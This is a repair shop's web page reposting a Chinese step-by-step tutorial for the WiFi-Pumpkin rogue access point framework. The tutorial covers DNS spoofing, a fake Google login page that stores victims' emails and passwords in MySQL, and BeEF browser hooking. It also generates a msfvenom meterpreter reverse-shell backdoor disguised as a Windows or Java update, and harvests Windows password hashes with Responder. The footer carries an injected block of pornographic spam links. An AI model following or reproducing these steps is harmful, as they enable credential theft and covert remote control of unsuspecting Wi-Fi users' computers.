錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
WiFi-Pumpkin無線滲透測試框架實戰教程

作者: 佚名  日期:2017-06-28 16:37:40   來源: 本站整理

 描述
WiFi-Pumpkin是一款專用于無線環境滲透測試的完整框架,利用該工具可以偽造接入點完成中間人攻擊,同時也支持一些其他的無線滲透測試功能。旨在提供更安全的無線網絡服務,該工具可以用來監聽目標的流量數據,通過無線釣魚的方式來捕獲不知情的用戶,以此來達到監控目標用戶數據流量的目的。
主要功能
Rouge WiFi Access Point
Deauth Attack Clients AP
Probe Request Monitor
DHCP Starvation Attack
Credentials Monitor
Transparent Proxy
Windows Update Attack
Phishing Manager
Partial Bypass HSTS protocol
Support beef hook
ARP Poison
DNS Spoof
Patch Binaries via MITM
Karma Attack (supporthostapd-mana)
LLMNR,NBT-NS and MDNSpoisoner(Responder)
Pumpkin-Proxy(ProxyServer(mitmproxyAPI))
Capture images on the fly
TCP-Proxy(with scapy)
插件
Plugin
Description
Dns2proxy
This tools offer a deffierent features for post-explotation once you change the DNS server to a Victim.
Sslstrip2
Sslstrip is a MITM tool that implements Moxie Marlinspike’s SSL stripping attacks based version fork
Sergio-proxy
Sergio Proxy(a Super Effective Recorder of Gathered inputs and Outputs) is an HTTP proxy that was written in Python for the Twisted framework.
BDFProxy-ng
Patch Binaries via MITM: BackdoorFactory + mitmProxy, bdfproxy-ng is a fork and review of the original BDFProxy.
Responder
Responder an LLMNR, NBT-NS and MDNS poisoner.
Transparent Proxy:
TransparentProxy可以允許用戶攔截/修改流量信息,同時可以實現目標頁面的javascripts注入,也可以輕松實現模塊化注入并創建一個Python文件(plugins/extension/目錄下),最后在PumpProxy(標簽)下顯示信息。

TCP-Proxy Server
在TCP stream中你可以設置一個代理。它可以通過scapy模塊過濾請求和響應流并且主動修改TCP protocol的數據包來獲得攔截。這插件使用模塊來view或者modify這攔截數據,僅僅加你的自定義模塊在”plugins/analyzers/”,自動被列舉在TCP-Proxy標簽。
安裝WiFi-Pumpkin
git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
pip install –r requirements.txt
./installer.sh –install
運行WiFi-Pumpkin:python wifi-pumpkin.py
創建釣魚頁面
設置MYSQL
/etc/init.d/mysql start
Mysql –u root
Create database xeus;
Use xeus;
Create table logins(networkvarchar(64), email varchar(64), password varchar(64));

下載Fake Page
git clone https://github.com/XeusHack/Fake-Login-Page.git
將Fake-Login-Page文件放到/var/www目錄下。
編輯database.php文件,設置文件內容:
$username = “root”;
$password = “”;
$db_name = “xeus”;
$tbl_name = “logins”;
這里設置的內容根據自己的環境而設定,我這里是我的環境。
重啟mysql:/etc/init.d/mysql restart
設置WiFi-Pumpkin
運行WiFi-Pumpkin,進入此目錄下,python WiFi-Pumpkin.py

 切換到Settings命令,可以設置SSID號,我這里直接選擇默認的PumpAP,信道號為11,這里我選擇了Enable Wireless Security,密碼為1234567890等。注意:這里NetworkAdapter是無線網卡的名稱,需要買一個無線網卡。

   然后往下拉,可以看到默認設置dhcp服務設置的信息,這里保持默認就行。
取消代理,在旁邊Plugins點擊,然后取消proxy server,如圖所示。

點擊Start,然后可以在手機上可以看到SSID為PumpAP的無線熱點。可以看到是加密狀態,輸入設置的密碼;1234567890,就可以連接上。

然后點擊Modules選項下的DNS Spoofer,進入頁面,以DNSSpoof默認域名example.com為例,點擊Start Attack。使DNS SpoofRunning…

選擇PhishingManager模塊,選擇Options里面的index.html,點擊StartServer。然后在手機客戶端連接上PumpAP無線熱點后,輸入example.com域名后,出現了設置的信息。
然后選擇SetDirectory,如圖所示,將上面設置的Fake-Login-Page路徑設置到SetEnv PATH里面,然后點擊StartServer?梢钥吹皆谑謾C客戶端里面出現的相關偽造的頁面。

在上面的偽造google頁面輸入郵箱和密碼之后,然后進入mysql的logins表中,可以看到相關的信息。

Beef配合攻擊
在/usr/share/beef-xss目錄下運行./beef。如圖所示。選擇其中的Hook URL。

然后http://127.0.0.1:3000/ui/authentication登陸beef,默認賬號和密碼都是beef。
按照上面設置PumpAP無線熱點過程,進入到Phishing Manager模塊,選中按照如圖所示進行設置。

然后點擊StartServer運行,然后在手機客戶端連接上PumpAP無線熱點,然后打開example.com域名。在beef頁面會出現受攻擊的機器。然后可以通過beef進入深入攻擊了。

反彈shell
生成一個shellcode后門,利用msfvenom命令:mefvenom –pwindows/meterpreter/reverse_tcp lhost=你的本機IP地址 lport=4444 –f exe –o windowsupdate.exe進入msfconsole界面,等待shell連接。

按照設置WiFi-Pumokin,進入DNS Spoofer界面,然后刪除DNS:spoof;里面的example.com,然后自己填入一個域名(我這里依然選擇example.com),這里注意一定要刪除之前的example.com,要不會占用一個端口,后面操作不會成功的。

在DNS spoofer頁面選擇Fake Update,進入此頁面,然后將自己生產的shellcode后門加入該路徑,這里可以選擇WindowsUpdate或者Java Update更新,Network Adapter要選擇wlan0,自己的無線網卡。

然后在目標機器連接到我的偽造的PumpAP無線熱點,輸入example.com域名。可以進入上面選擇的偽造頁面。

javaUpdate頁面如下圖所示。

如果被攻擊者電腦下載了我們的后門,安裝了后門。那么我們就可以在kali里面獲取它的電腦權限。

Stealing Accouts Password Hashes
運行WiFi-Pumpkin程序,在界面上Advanced Mode:Monitor MITM Attack選擇Responder。如圖所示。

然后在Plugins選擇Responder,并且關閉Enable proxy server.可以在change打開配置頁面。(一般默認就好,也可以根據自己想要抓取的選擇開啟和關閉),如圖所示。


我們主要的目的是抓取windows的賬號和密碼,在目標機器上運行此操作,就會在wifi-pumpkin的responder顯示出目標機的用戶名和hash密碼。

 

總結:

上面的主要是參考部分文章然后自己來驗證的,參考文章如下:



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 少妇无码AV无码专区在线观看 | 亚洲va无码手机在线电影| 国产精品无码一区二区三区不卡 | 最新中文字幕av无码专区| 亚洲av无码成h人动漫无遮挡| 亚洲国产精品无码第一区二区三区 | 久久久久久亚洲av成人无码国产| 国产V亚洲V天堂无码| 亚洲精品中文字幕无码A片老| 亚洲精品无码AV中文字幕电影网站| 日韩精品真人荷官无码| 国精品无码一区二区三区在线蜜臀| 亚洲AV无码专区在线亚| 伊人久久综合精品无码AV专区| 日韩AV无码中文无码不卡电影| 无码一区二区三区亚洲人妻| 蜜桃臀无码内射一区二区三区| 免费A级毛片无码久久版| 亚洲日韩乱码中文无码蜜桃| 免费无码又爽又黄又刺激网站| 水蜜桃av无码一区二区| 最新亚洲人成无码网站| AA区一区二区三无码精片| 亚洲AV无码乱码在线观看牲色 | 毛片亚洲AV无码精品国产午夜| 无套内射在线无码播放| 亚洲午夜国产精品无码老牛影视| 国产成人无码av在线播放不卡 | 国产精品免费看久久久无码| 亚洲一区二区三区无码中文字幕| 蜜臀AV无码精品人妻色欲| 亚洲精品~无码抽插| 亚洲中文字幕无码爆乳av中文 | 潮喷失禁大喷水无码| 成人年无码AV片在线观看| 性色av无码免费一区二区三区| 亚洲av无码成人精品区一本二本| 亚洲中文字幕久久无码| 日韩av片无码一区二区不卡电影| 亚洲AV无码无限在线观看不卡 | 国产精品无码免费播放|